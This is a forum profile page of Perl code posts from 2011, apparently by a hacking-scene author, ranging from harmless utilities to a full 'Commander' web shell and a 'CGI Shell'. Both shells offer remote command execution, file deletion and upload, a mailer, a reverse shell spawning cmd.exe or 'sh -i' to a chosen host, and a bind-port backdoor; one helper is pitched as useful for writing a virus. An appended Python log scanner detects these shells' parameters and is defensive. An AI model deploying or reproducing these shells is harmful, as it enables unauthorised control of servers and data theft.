Messages - BigBear

#501
Perl / [Perl] Function printear()
July 03, 2011, 09:44:33 PM
Hello everyone, today I bring you a function for
using colors in Perl to display the text we want

Code: perl

#By Doddy H

use Color::Output;
Color::Output::Init;

sub printear {
if ($_[1] eq "text") {
cprint("\x03".$_[2].$_[0]."\x030\n");
}
elsif ($_[1] eq "stdin") {
if ($_[3] ne "") {
cprint("\x03".$_[2].$_[0]."\x030"."\x03".$_[3]);
my $op = <stdin>;
chomp $op;
cprint ("\x030");
return $op;
}
}
else {
print "error\n";
}
}


Syntax

Code: perl

printear("text","text/stdin","color text","color output")


Usage examples

With normal text

Code: perl

printear("hola","text","10","5");


Text with keyboard input

Code: perl

my $d  = printear("nombre : ","stdin","6","2");
print "pusiste $d\n";

#502
Perl / [Perl] Function movewin()
July 03, 2011, 09:44:23 PM
Well, with this function you can drive a window crazy so
that it moves in wicked ways

Code: perl

#By Doddy H
use Win32::API;

sub movewin {
for my $n(1..20) {
Win32::API->new("user32","SetWindowPos",[qw(N N N N N NN)],'N')->Call($_[0],$n,$n,$n,$n,$n,$n);
}
}



Usage example

Code: perl

movewin(id ventana);
#503
Perl / [Perl] Function killprocess()
July 03, 2011, 09:44:12 PM
Hello everyone, here I bring you a function to
close the process you hate by giving its name and PID

Code: perl

use Win32::Process;

sub killprocess {

my ($numb,$pid) = @_;

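if (Win32::Process::KillProcess($pid,$numb)) {
return 1; # the bareword "true" is only a string
} else {
return 0; # the bareword "false" is the non-empty string "false", which tests as true
}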
}


Usage example

Code: perl

if (killprocess("deamon.exe","4052")) {
print "chau\n\a";
}
#504
Perl / [Perl] Function hideit()
July 03, 2011, 09:43:57 PM
With this function you can hide or show hidden
files/directories in Windows

Code: perl

#By Doddy H
use Win32::File;

sub hideit {
if ($_[1] eq "show") {
Win32::File::SetAttributes($_[0],NORMAL);
}
elsif ($_[1] eq "hide") {
Win32::File::SetAttributes($_[0],HIDDEN);
}
else {
print "error\n";
}
}


Usage example show/hide

Code: perl

hideit("test.pl","show");


#505
Perl / [Perl] Function getprocess()
July 03, 2011, 09:43:46 PM
Hello, here I bring you a function that will show you the
processes on your computer

Code: perl

use Win32::OLE qw(in);

sub getprocess {

my %procesos;

my $uno = Win32::OLE->new("WbemScripting.SWbemLocator");
my $dos = $uno->ConnectServer("","root\\cimv2");

foreach my $pro (in $dos->InstancesOf("Win32_Process")){
$procesos{$pro->{Caption}} = $pro->{ProcessId};
}
return %procesos;
}


Usage example

Code: perl

my %vida = getprocess();

for my $data(keys %vida) {
print "[Proceso] : ".$data."\n";
print "[PID] : ".$vida{$data}."\n\n";
}
#506
Perl / [Perl] Function getmyip()
July 03, 2011, 09:41:33 PM
Hello everyone.

Here is a function I made to find out
our own IP without needing to use web pages with that annoying
online service

Code: perl

#By Doddy H
use IO::Socket;

sub get_ip {
my $get = gethostbyname("");
return inet_ntoa($get);
}


Usage example

Code: perl

print get_ip();
#507
Perl / [Perl] Function getlink()
July 03, 2011, 09:41:22 PM
Hello, here I bring you a function to search for
links in a web page

Code: perl

use HTML::LinkExtor;

sub get_links {

$test = HTML::LinkExtor->new(\&agarrar)->parse($code);
return @links;

sub agarrar {
my ($a,%b) = @_;
push(@links,values %b);
}
}



Usage example

Code: perl

use LWP::Simple;

$code = get("http://127.0.0.1/doddy/index.php");

my @ver = get_links();

for my $url(@ver) {
print $url."\n";
}
#508
Perl / [Perl] Function getdrive()
July 03, 2011, 09:41:09 PM
With this function you can get the drive that is currently running
(c:/ or whichever it is)

Code: perl

#By Doddy H
use Cwd;


sub getdrive {

$path = getcwd();

if ($path=~/(.*):\/\//ig or $path=~/(.*):\//) {
return $1.":/";
}

}


Usage example

Code: perl

print getdrive();

#509
Perl / [Perl] Function download()
July 03, 2011, 09:40:55 PM
Hello, here I bring you a function to download
files

Code: perl

#!usr/bin/perl
#Simple downloader in Perl
#By Doddy H

use LWP::UserAgent;

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

sub download {
if ($nave->mirror($_[0],$_[1])) {
if (-f $_[1]) {
return true;
}}}


Syntax

Code: text

download(url to download,file name to save it as);


Usage example

Code: perl

if (download("http://127.0.0.1/bones.rar","bones.rar")) {
print "[+] file downloaded\n";
}

#510
Perl / [Perl] Function crazymouse()
July 03, 2011, 09:40:43 PM
Hello everyone

Yes, me again with this new function crazymouse();
with this function you can drive the mouse crazy so it cannot be controlled,
all for a time chosen by you, very useful if you are about to
make a virus

Code: perl

#By Doddy H
use Win32::GuiTest qw(MouseMoveAbsPix SendMessage);

sub crazymouse {
for my $number(1..$_[0]) {
MouseMoveAbsPix($number,$number);
}
}


Usage example

Code: perl

crazymouse("666");

#511
Perl / [Perl] Function conectar()
July 03, 2011, 09:40:26 PM
Hello everyone.

Here is a function to connect via sockets to whatever server you want

Code: perl

use IO::Socket;

sub conectar {

my $sockex = new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $_[1],
Proto => "tcp",Timeout  => 5);

print $sockex $_[2]."\r\n";
$sockex->read($re,5000);
$sockex->close;
return $re."\r\n";
}


Syntax

Code: text

conectar(host,port,parameter to send)


Usage example

Code: perl
	
$re = conectar("127.0.0.1","80","GET /sql.php HTTP/1.0\r\n");
print $re;



#512
Perl / [Perl] Function cmd()
July 03, 2011, 09:40:16 PM
Hello everyone

I just made this cmd() function to be able to run commands
conveniently

Code: perl

#By Doddy H

use Win32::Job;

sub cmd {

my $job = Win32::Job->new;
$job->spawn("cmd",qq{cmd /C $_[0]},{
no_window => "true",
stdout => "logx.txt",
stderr => "logx.txt"
}
);
$ok = $job->run("30");

open (F,"logx.txt");
@words = <F>;
close F;

unlink("logx.txt");

return @words;

}


Usage example

Code: perl

@re = cmd("ver");
print @re;

#513
Perl / [Perl] Function cambiar_fondo()
July 03, 2011, 09:40:04 PM
Hello everyone

I just made a function using the Windows API to
change the desktop background just by giving the path of the
image

Code: perl


#By Doddy H

use Win32::API;

sub cambiar_fondo {

my $a = new Win32::API("user32","SystemParametersInfo", [L,L,P,L],L);
$a->Call(20,0,$_[0],0);

}


Usage example

Code: perl

cambiar_fondo("c:/Perl/img.bmp");
#514
Perl / [Perl] FTP Manager
July 03, 2011, 09:39:45 PM
Today I finished this simple FTP client; the code is as follows

Code: perl

#!usr/bin/perl
#FTP Manager
#(C) Doddy Hackman 2010

use Net::FTP;

&head;

print "\n\n[FTP Server] : ";
chomp (my $ftp = <stdin>);
print "[User] : ";
chomp (my $user = <stdin>);
print "[Pass] : ";
chomp (my $pass = <stdin>);


if (my $socket = Net::FTP->new($ftp)) {
if ($socket->login($user,$pass)) {

print "\n[+] Enter of the server FTP\n\n";

menu:

print "\n\n>>";
chomp (my $cmd = <stdin>);
print "\n\n";

if ($cmd=~/help/) {
print q(

help : show information
cd : change directory <dir>
dir : list a directory
mkdir : create a directory <dir>
rmdir : delete a directory <dir>
pwd : directory 
del : delete a file <file>
rename : change name of the a file <file1> <file2>
size : size of the a file <file>
put : upload a file <file>
get : download a file <file>
cdup : change dir <dir>


);
}

if ($cmd=~/dir/ig) {
if (my @files = $socket->dir()) {
for(@files) {
print "[+] ".$_."\n";
}
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/pwd/ig) {
print "[+] Path : ".$socket->pwd()."\n";
}

if ($cmd=~/cd (.*)/ig) {
if ($socket->cwd($1)) {
print "[+] Directory changed\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/cdup/ig) {
if (my $dir = $socket->cdup()) {
print "\n\n[+] Directory changed\n\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/del (.*)/ig) {
if ($socket->delete($1)) {
print "[+] File deleted\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/rename (.*) (.*)/ig) {
if ($socket->rename($1,$2)) {
print "[+] File Updated\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/mkdir (.*)/ig) {
if ($socket->mkdir($1)) {
print "\n\n[+] Directory created\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/rmdir (.*)/ig) {
if ($socket->rmdir($1)) {
print "\n\n[+] Directory deleted\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/exit/ig) {
copyright();
exit(1);
}

if ($cmd=~/get (.*) (.*)/ig) {
print "\n\n[+] Downloading file\n\n";
if ($socket->get($1,$2)) {
print "[+] Download completed";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/put (.*) (.*)/ig) {
print "\n\n[+] Uploading file\n\n";
if ($socket->put($1,$2)) {
print "[+] Upload completed";
} else {
print "\n\n[-] Error\n\n";
}
}

goto menu;

} else {
print "\n\n[-] Failed the login\n\n";
}

} else {
print "\n\n[-] Error\n\n";
}

sub head {
print "\n\n -- == FTP Manager == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2010\n\n";
}


# ¿ The End ?


If you want to download it from SourceForge

Code: text

https://sourceforge.net/projects/ftpmanager/

#515
Perl / [Perl] Find paths
July 03, 2011, 09:38:44 PM
A simple scanner to look for directories without an index on
whatever page you want

Code: perl

#!usr/bin/perl
#Find Paths
#(C) Doddy Hackman 2011

use LWP::UserAgent;
use HTML::LinkExtor;
use URI::Split qw(uri_split);

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();
unless($ARGV[0]) {
print "\n\n[+] Sintax : $0 <web>\n\n";
} else {
scan($ARGV[0]);
}
copyright();

sub scan {

print "\n[+] Find paths in $_[0]\n\n\n";
my @urls = repes(get_links(toma($_[0])));
for $url(@urls) {
my $web = $url;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($url);
if ($_[0] =~/$auth/ or $auth eq "") {
if ($path=~/(.*)\/(.*)\.(.*)$/) {
my $borrar = $2.".".$3;
if ($web=~/(.*)$borrar/) {
my $co = $1;
unless ($co=~/$auth/) {
$co = $_[0].$co;
}
$code = toma($co);
if ($code=~/Index Of/ig) {
print "[Link] : ".$co."\n";
}}}}}}

sub get_links {

$test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
return @links;

sub agarrar {
my ($a,%b) = @_;
push(@links,values %b);
}
}

sub repes {
foreach $test(@_) {
push @limpio,$test unless $repe{$test}++;
}
return @limpio;
}

sub head {
print "\n\n-- == Find Paths == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}

sub toma {
return $nave->get($_[0])->content;
}

sub tomar {
my ($web,$var) = @_;
return $nave->post($web,[%{$var}])->content;
}

#Thanks to explorer (PerlEnEspañol)
# ¿ The End ?
#516
Perl / [Perl] DH Player
July 03, 2011, 09:38:25 PM
Well, this is a simple music player I made in Perl
In this version you can search for music and play it, all in one great window

Code: perl

#!usr/bin/perl
#DH Player 0.1
#(C) Doddy Hackman 2011

use Tk;
use Win32::MediaPlayer;

if ($^O eq 'MSWin32') {
use Win32::Console;
Win32::Console::Free();
}


$test = new Win32::MediaPlayer;

$new = MainWindow->new(-background=>"black");
$new->geometry("350x420+20+20");
$new->resizable(0,0);
$new->title("DH Player 0.1 (C) Doddy Hackman 2011");
$new->Label(-background=>"black",-foreground=>"green",-font=>"Impact",-text=>"Directory : ")->place(-x=>"20",-y=>"20");
my $dir = $new->Entry(-background=>"black",-foreground=>"green",-text=>"C:\\Users\\Daniel\\Desktop\\WarFactory\\Perl\\musica")->place(-x=>"100",-y=>"25");
$new->Button(-background=>"black",-foreground=>"green",-activebackground=>"green",-text=>"Search",-width=>"10",-command=>\&buscar)->place(-x=>"240",-y=>"25");
$new->Label(-background=>"black",-foreground=>"green",-text=>"Files Found",-font=>"Impact")->place(-y=>"95",-x=>"120");
my $lists = $new->Listbox(-background=>"black",-foreground=>"green")->place(-y=>"130",-x=>"100");
$new->Button(-background=>"black",-foreground=>"green",-text=>"Play",-width=>"55",-activebackground=>"green",-command=>\&play)->place(-y=>"310");
$new->Button(-background=>"black",-foreground=>"green",-text=>"Pause",-width=>"55",-activebackground=>"green",-command=>\&pause)->place(-y=>"333");
$new->Button(-background=>"black",-foreground=>"green",-text=>"Resume",-width=>"55",-activebackground=>"green",-command=>\&resume)->place(-y=>"356");
$new->Button(-background=>"black",-foreground=>"green",-text=>"Stop",-width=>"55",-activebackground=>"green",-command=>\&stop)->place(-y=>"379");


MainLoop;


sub play {

my $dir = $dir->get;

$d = $lists->curselection();

for my $id (@$d) {
my $cancion = $lists->get($id);
$test->load($dir."\\".$cancion);
$test->play;
}

}

sub stop {
$test->close;
}

sub pause {

my $dir = $dir->get;

$d = $lists->curselection();

for my $id (@$d) {
my $cancion = $lists->get($id);
$test->pause;
}

}

sub resume {

my $dir = $dir->get;

$d = $lists->curselection();

for my $id (@$d) {
my $cancion = $lists->get($id);
$test->resume;
}

}

sub buscar {

$lists->delete(0.0,"end");

#$dir = "C:\\Users\\Daniel\\Desktop\\WarFactory\\Perl\\musica";

my $dir = $dir->get;

opendir DIR,$dir;

my @archivos = readdir DIR;

closedir DIR; # directory handles are closed with closedir, not close

chomp @archivos;

foreach my $file(@archivos) {
if (-f $dir."\\".$file) {
$lists->insert("end",$file);
}
}

}


# ¿ The End ?



If you want to download it from SourceForge

Code: text

https://sourceforge.net/projects/dhplayer/


#517
Perl / [Perl] Commander
July 03, 2011, 09:38:14 PM
Well, this program is a web server in Perl with the following options

* List directories
* View files
* Delete directories and files
* ReverseShell
* BindPort

Code: perl

#!usr/bin/perl
#
#C0mmand3r (C) Doddy HAckman 2011
#Version 0.1
#
#A simple WebShell in Perl
#
#

use IO::Socket;
use CGI;
use Cwd;
use HTML::Entities;
use URI::Escape;
use Win32;
use Net::hostent;

my $port = rep();

sub rep {
unless($ARGV[0]) {
return int("666"); #Your Can Edit 666
} else {
return int($ARGV[0]);
}
}

print "\n\n#########################################\n\n";
print "C0mmand3r (C) Doddy HAckman 2011\n\n\n";
print "[+] Starting the webshell on port $port\n\n";
print "#########################################\n\n";


my $sock = new IO::Socket::INET(
LocalHost => 'localhost',
LocalPort => $port,
Proto     => 'tcp',
Listen    => SOMAXCONN,
Reuse     => 1);


while ($jebus = $sock->accept()) {


print $jebus "HTTP/1.1 200/OK\r\nContent-type:text/html\r\n\r\n";
#print $jebus "HTTP/1.1 200/OK\r\nContent-type:application/w-www-form-urlencoded\r\n\r\n";
next if $slave=fork;

close $sock;

while ($response = <$jebus>) {

chomp($response);

my %rta;


if ($response=~/GET/ig) {
capturar($response);
}


sub capturar {
my $aa = shift;
chomp $aa;
if ($aa=~/GET \/(.*) HTTP\/1.1/ig) {
my $todo = $1;
if ($todo=~/\?(.*)=(.*)&(.*)=(.*)/ig) {
$rta{$1} = $2;
$rta{$3} = $4;
}
if ($todo=~/\?(.*)=(.*)/ig) {
$rta{$1} = $2;
}
}


}

print $jebus "

<html><body><title>Commander (C) Doddy Hackman 2011</title>

<style type=text/css>

.main {
margin : -287px 0px 0px -490px;
border : White solid 1px;
BORDER-COLOR: cyan;
}


#pie {
position: absolute;
bottom: 0;
}

body,a:link {
background-color: #000000;
color:cyan;
Courier New;
cursor:crosshair;
font-size: small;
}

input,table.outset,table.bord,table,textarea,select {
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
background-color:black;color:cyan;
border: solid 1px cyan;
border-color:cyan
}

a:link,a:visited,a:active {
color: cyan;
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
text-decoration: none;
}

</style>


<h2><center>Commander WebShell</center></h2>

";


if ($rta{'loadfile'}) {

my $file = uri_unescape($rta{'loadfile'});


print $jebus "<br><h2><center>File ".$file."</h2></center><br><br>";

if (-f $file) {

print $jebus "<center><textarea name=codefile cols=70 rows=70>";

open (FILE,$file);
@words = <FILE>;
close FILE;

for (@words) {
print $jebus HTML::Entities::encode($_);
}
print $jebus "
</textarea></center>
</center><br><br>
</form>
";

exit(1);
}
}

print $jebus "
<br><br>
<b>Console</b>
<br><br>
<fieldset>";


if ($rta{'cmd'}) {
print $jebus qx($rta{'cmd'});
}


elsif ($rta{'loadir'}) {
my $dir = uri_unescape($rta{'loadir'});
print "recibi $dir\n\n";
if (-d $dir) {
opendir DIR,$dir;
my @archivos = readdir DIR;
close DIR;

for(@archivos) {

if (-d $_) {
print $jebus "<b>".$_."</b><br>";
} else {
print $jebus $_."<br>";
}}}}

elsif ($rta{'delfile'}) {

my $file = uri_unescape($rta{'delfile'});


if (-f $file) {

if (unlink($file)) {
print $jebus "<script>alert('File Deleted');</script>";
} else {
print $jebus "<script>alert('Error');</script>";
}
}
}

elsif ($rta{'deldir'}) {

my $dir = uri_unescape($rta{'deldir'});

if (-d $dir) {
if (rmdir($dir)) {
print $jebus "<script>alert('Directory Deleted');</script>";
} else {
print $jebus "<script>alert('Error');</script>";
}
}
}

elsif ($rta{'ipconnect'}) {
print $rta{'ipconnect'}."\n";
print $rta{'port'}."\n";
conectar($rta{'ipconnect'},$rta{'port'});
tipo();

sub conectar {
socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
open (STDIN,">&REVERSE");
open (STDOUT,">&REVERSE");
open (STDERR,">&REVERSE");
}

sub tipo {
print "\n[*] Reverse Shell Starting...\n\n";
if ($^O =~/Win32/ig) {
infowin();
system("cmd.exe");
} else {
infolinux();
#root(); 
system("export TERM=xterm;exec sh -i");
}
}

sub infowin {
print "[+] Domain Name : ".Win32::DomainName()."\n";
print "[+] OS Version : ".Win32::GetOSName()."\n";
print "[+] Username : ".Win32::LoginName()."\n\n\n";
}

sub infolinux {
print "[+] System information\n\n";
system("uname -a");
print "\n\n";
}
}

elsif($rta{'portbind'}) {

$backdoor = IO::Socket::INET->new(
Proto     => 'tcp',
LocalPort => $rta{'portbind'},
Listen    => SOMAXC,
Reuse     => 1);


while ($jesus = $backdoor->accept()) {
$jesus->autoflush(1);
print $jesus "[*] Heaven_Door Online\n[*] Port : 25256\n[*] PID : ".$$."\n\n";
print $jesus "Welcome  ".$jesus->peerhost."\n\n";
&extras;
$dir = getcwd();
print $jesus $dir.">>";
while (<$jesus>) {
my $yeah = qx($_);
print $jesus "\n\n".$yeah."\n\n";
print $jesus $dir.">>";
}
}

sub extras {

if ($^O =~//ig) {
print $jesus "[+] Domain Name : ".Win32::DomainName()."\n";
print $jesus "[+] OS Version : ".Win32::GetOSName()."\n";
print $jesus "[+] Username : ".Win32::LoginName()."\n\n\n";
} else {
$s =  qx("uname -a");
print $jesus "--==System Info==--\n\n".$s;
}
}
} else {

opendir DIR,getcwd();
my @archivos = readdir DIR;
close DIR;

for(@archivos) {
if (-d $_) {
print $jebus "<b>".$_."</b><br>";
} else {
print $jebus $_."<br>";
}}

}

print $jebus "</fieldset>
<br><br>
<form action='' method=GET>
<b>Command</b> : <input type=text name=cmd size=100 value=ver><input type=submit value=Send><br>
</form>
<form action='' method=GET>
<B>Load directory</B> : <input type=text size=100 name=loadir value=".getcwd()."><input type=submit value=Load>
</form>
<form action='' method=GET>
<b>Load File</b> : <input type=text size=100 name=loadfile value=".getcwd()."><input type=submit value=Load>
</form>
<form action='' method=GET>
<b>Delete File</b> : <input type=text size=100 name=delfile value=".getcwd()."><input type=submit value=Del>
</form>
<form action='' method=GET>
<b>Delete Directory</b> : <input type=text size=100 name=deldir><input type=submit value=Del>
</form>
<br><br><b>ReverseShell</b><br><br>
<form action='' method=GET>
<b>Your IP</B> : <input type=text name=ipconnect value=localhost><br>
<b>Port</b> : <input type=text name=port value=666><br>
<br><input type=submit value=Connect></form><br><br>

<b>BindPort</b><br><br>
<form action='' method=GET>
<b>Port</b> : <input type=text name=portbind value=666><br>
<br><input type=submit value=Bind></form><br><br>


</body></html>
";

$jebus->close;

}

} continue {
$jebus->close;
}

# ¿ The End ? 


If you want to download it from SourceForge

Code: text

https://sourceforge.net/projects/commanderx/
#518
Perl / [Perl] CGI Shell
July 03, 2011, 09:38:00 PM
Hello everyone

Today I finished making a shell in CGI; these shells are used on pages that allow CGI files to be executed and have the cgi-bin directory

This shell has the following options

* List directories
* View and edit files
* Delete files and directories
* ReverseShell
* Upload files to a specified directory
* Execute commands
* Send mails

Code: perl

#!"\xampp\perl\bin\perl.exe"
#
#CGI Shell 0.1
#
#(C) Doddy Hackman 2011
#
#

use CGI;
use Cwd;
use HTML::Entities;
use Net::SMTP;

my %rta;

my $que = new CGI;
my @ques = $que->param;

for(@ques) {
$rta{$_} = $que->param($_);
}


print "Content-type:text/html\n\n";
print "

<style type=text/css>


.main {
margin : -287px 0px 0px -490px;
border : White solid 1px;
BORDER-COLOR: #00FF00;
}


#pie {
position: absolute;
bottom: 0;
}

body,a:link {
background-color: #000000;
color:#00FF00;
Courier New;
cursor:crosshair;
font-size: small;
}

input,table.outset,table.bord,table,textarea,select {
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
background-color:black;color:#00FF00;
border: solid 1px #00FF00;
border-color:#00FF00
}

a:link,a:visited,a:active {
color: #00FF00;
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
text-decoration: none;
}

</style>

<title>CGI Shell (C) Doddy Hackman 2011</title>
<h2><center>CGI Shell</center></h2>

";

if ($rta{'filex'}) {

open FILE ,">>".$rta{'todir'}."/".$rta{'filex'};
while($bytes = read($rta{'filex'},$todo, 1024)) {
print FILE $todo;
}
close FILE;

print "<script>alert('File Uploaded');</script>";

}

if ($rta{'codefile'}) {

unlink($rta{'filecode'});

open (FILE,">>".$rta{'filecode'});
print FILE $rta{'codefile'}."\n";
close FILE;

print "<script>alert('File Changed');</script>";

}

if ($rta{'loadfile'}) {
print "<form action='' method=POST>";
print "<br><h2><center>File ".$rta{'loadfile'}."</h2></center><br><br>";

if (-f $rta{'loadfile'}) {

print "<center><textarea name=codefile cols=70 rows=70>";

open (FILE,$rta{'loadfile'});
@words = <FILE>;
close FILE;

for (@words) {
print HTML::Entities::encode($_);
}
print "
</textarea></center>
<input type=hidden name=filecode value=".$rta{'loadfile'}.">
<br><br><center><input type=submit value=Save></center><br><br>
</form>
";

exit(1);
}
}

print "
<br><br>
<b>Console</b>
<br><br>
<fieldset>";


if ($rta{'cmd'}) {
print qx($rta{'cmd'});
}

elsif ($rta{'mail'}) {

my $send = Net::SMTP->new("localhost",Hello => "localhost",Timeout=>10) or die("[-] Error");
$send->mail($rta{'mail'});
$send->to($rta{'to'});   
$send->data();
$send->datasend("To:".$rta{'to'}."\n"."From:".$rta{'mail'}."\n"."Subject:".$rta{'subject'}."\n".$rta{'body'}."\n\n");
$send->dataend();
$send->quit();

}


elsif ($rta{'loadir'}) {

if (-d $rta{'loadir'}) {

opendir DIR,$rta{'loadir'};
my @archivos = readdir DIR;
close DIR;

for(@archivos) {
if (-d $_) {
print "<b>".$_."</b><br>";
} else {
print $_."<br>";
}}}}

elsif (-f $rta{'delfile'}) {
if (unlink($rta{'delfile'})) {
print "<script>alert('File Deleted');</script>";
} else {
print "<script>alert('Error');</script>";
}
}

elsif (-d $rta{'deldir'}) {
if (rmdir($rta{'deldir'})) {
print "<script>alert('Directory Deleted');</script>";
} else {
print "<script>alert('Error');</script>";
}
}

elsif ($rta{'ipconnect'}) {

$code = '
#!usr/bin/perl
#Reverse Shell 0.1
#By Doddy H

use IO::Socket;

print "\n== -- Reverse Shell 0.1 - Doddy H 2010 -- ==\n\n";

unless (@ARGV == 2) {
print "[Sintax] : $0 <host> <port>\n\n";
exit(1);
} else {
print "[+] Starting the connection\n";
print "[+] Enter in the system\n";
print "[+] Enjoy !!!\n\n";
conectar($ARGV[0],$ARGV[1]);
tipo();
}

sub conectar {
socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
open (STDIN,">&REVERSE");
open (STDOUT,">&REVERSE");
open (STDERR,">&REVERSE");
}

sub tipo {
print "\n[*] Reverse Shell Starting...\n\n";
if ($^O =~/Win32/ig) {
infowin();
system("cmd.exe");
} else {
infolinux();
#root(); 
system("export TERM=xterm;exec sh -i");
}
}

sub infowin {
print "[+] Domain Name : ".Win32::DomainName()."\n";
print "[+] OS Version : ".Win32::GetOSName()."\n";
print "[+] Username : ".Win32::LoginName()."\n\n\n";
}

sub infolinux {
print "[+] System information\n\n";
system("uname -a");
print "\n\n";
}

#The End
';

if ($^O =~/Win32/ig) {
open (FILE,">>"."back.pl");
chmod("back.pl","777");
} else {
open (FILE,">>"."/tmp/back.pl");
chmod("/tmp/back.pl","777");
}

print FILE $code;
close FILE;

if ($^O == "MSWin32") {
system("back.pl ".$rta{'ipconnect'}." ".$rta{'port'});
} else {
system("cd /tmp;back.pl ".$rta{'ipconnect'}." ".$rta{'port'});
}
} else {

opendir DIR,getcwd();
my @archivos = readdir DIR;
close DIR;

for(@archivos) {
if (-d $_) {
print "<b>".$_."</b><br>";
} else {
print $_."<br>";
}}

}

print "</fieldset>
<br><br>
<form action='' method=GET>
<b>Command</b> : <input type=text name=cmd size=100 value=ver><input type=submit value=Send><br>
</form>
<form action='' method=GET>
<B>Load directory</B> : <input type=text size=100 name=loadir value=".getcwd()."><input type=submit value=Load>
</form>
<form action='' method=GET>
<b>Load File</b> : <input type=text size=100 name=loadfile value=".getcwd()."><input type=submit value=Load>
</form>
<form action='' method=GET>
<b>Delete File</b> : <input type=text size=100 name=delfile value=".getcwd()."><input type=submit value=Del>
</form>
<form action='' method=GET>
<b>Delete Directory</b> : <input type=text size=100 name=deldir><input type=submit value=Del>
</form>
<form enctype='multipart/form-data' method=POST>
<br><b>Upload File</b> : <input type=file name=filex><br><br>
<b>To dir</b> : <input type=text name=todir value=".getcwd()."><br><br>
<input type=submit value=Upload>
</form>
<br><B>Mailer</b><br><br>
<form action='' method=GET>
<b>Mail</b> : <input type=text name=mail><br>
<b>To</b> : <input type=text name=to><br>
<b>Subject</B> : <input type=text name=subject><br>
<B>Body</B> : <input type=text name=body><br><br>
<input type=submit value=Send>
</form>
<br><br><b>ReverseShell</b><br><br>
<form action='' method=GET>
<b>IP</B> : <input type=text name=ipconnect><br>
<b>Port</B> : <input type=text name=port><br>
<br><input type=submit value=Connect></form><br><br>

";


# ¿ The End ?


If you want to download it from SourceForge

Code: text

https://sourceforge.net/projects/cgishellx/
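
Added example, not part of the original posts or of either project: both the Commander and the CGI Shell posts above drive most actions through GET forms, so the parameter names their code reads (`loadir`, `delfile`, `ipconnect`, `portbind` and so on) end up in the web server's access log. The Python sketch below groups those names per client and path and grades each group; the log lines, addresses and script paths are constructed, and the strong/weak split and the level names are assumptions of this example.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Query parameter names read by the two shells, taken from their posted code.
# STRONG names are unusual in ordinary applications. WEAK names are common
# words: they are reported next to a strong name, and "cmd" alone is "low".
STRONG = {"loadir", "loadfile", "delfile", "deldir", "ipconnect", "portbind",
          "codefile", "filecode", "filex", "todir"}
WEAK = {"cmd", "port", "mail", "to", "subject", "body"}

# Common/Combined Log Format: client ident user [time] "request" status ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)

# Constructed sample log: documentation addresses, hypothetical script paths.
# The POST line shows the blind spot: the CGI shell's upload and file-save
# forms use POST, and request bodies are not written to the access log.
SAMPLE_LOG = """\
203.0.113.7 - - [03/Jul/2011:21:38:00 +0000] "GET /cgi-bin/s.pl?loadir=%2Fvar%2Fwww HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [03/Jul/2011:21:38:09 +0000] "GET /cgi-bin/s.pl?cmd=ver HTTP/1.1" 200 230 "-" "Mozilla/5.0"
203.0.113.7 - - [03/Jul/2011:21:38:30 +0000] "GET /cgi-bin/s.pl?ipconnect=198.51.100.9&port=666 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.7 - - [03/Jul/2011:21:39:02 +0000] "POST /cgi-bin/s.pl HTTP/1.1" 200 97 "-" "Mozilla/5.0"
198.51.100.20 - - [03/Jul/2011:21:40:11 +0000] "GET /search.php?cmd=help&page=2 HTTP/1.1" 200 1400 "-" "Mozilla/5.0"
198.51.100.21 - - [03/Jul/2011:21:41:45 +0000] "GET /contact.php?to=sales&subject=hello HTTP/1.1" 200 900 "-" "Mozilla/5.0"
not a log line
"""


def parse_line(line):
    """Return client, path and lower-cased query parameter names, or None."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    url = urlsplit(m.group("target"))
    names = {k.lower() for k, _ in parse_qsl(url.query, keep_blank_values=True)}
    return {"client": m.group("client"), "path": url.path, "names": names}


def scan(lines):
    """Group shell parameter names per (client, path) and grade each group."""
    seen = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = rec["names"] & (STRONG | WEAK)
        if hits:
            seen[(rec["client"], rec["path"])] |= hits

    findings = []
    for (client, path), names in sorted(seen.items()):
        strong = names & STRONG
        if len(strong) >= 2 or (strong and "cmd" in names):
            level = "high"      # several shell actions against one script
        elif strong:
            level = "medium"    # one distinctive name
        elif "cmd" in names:
            level = "low"       # plausible in a legitimate app, worth a look
        else:
            continue            # only common words such as "to" or "subject"
        findings.append({"client": client, "path": path,
                         "level": level, "params": sorted(names)})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG.splitlines()):
        print(finding)
```

A "high" finding names the script path to inspect on disk; a renamed parameter set would not match, so this complements file-integrity checks on the CGI directories rather than replacing them.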
#519
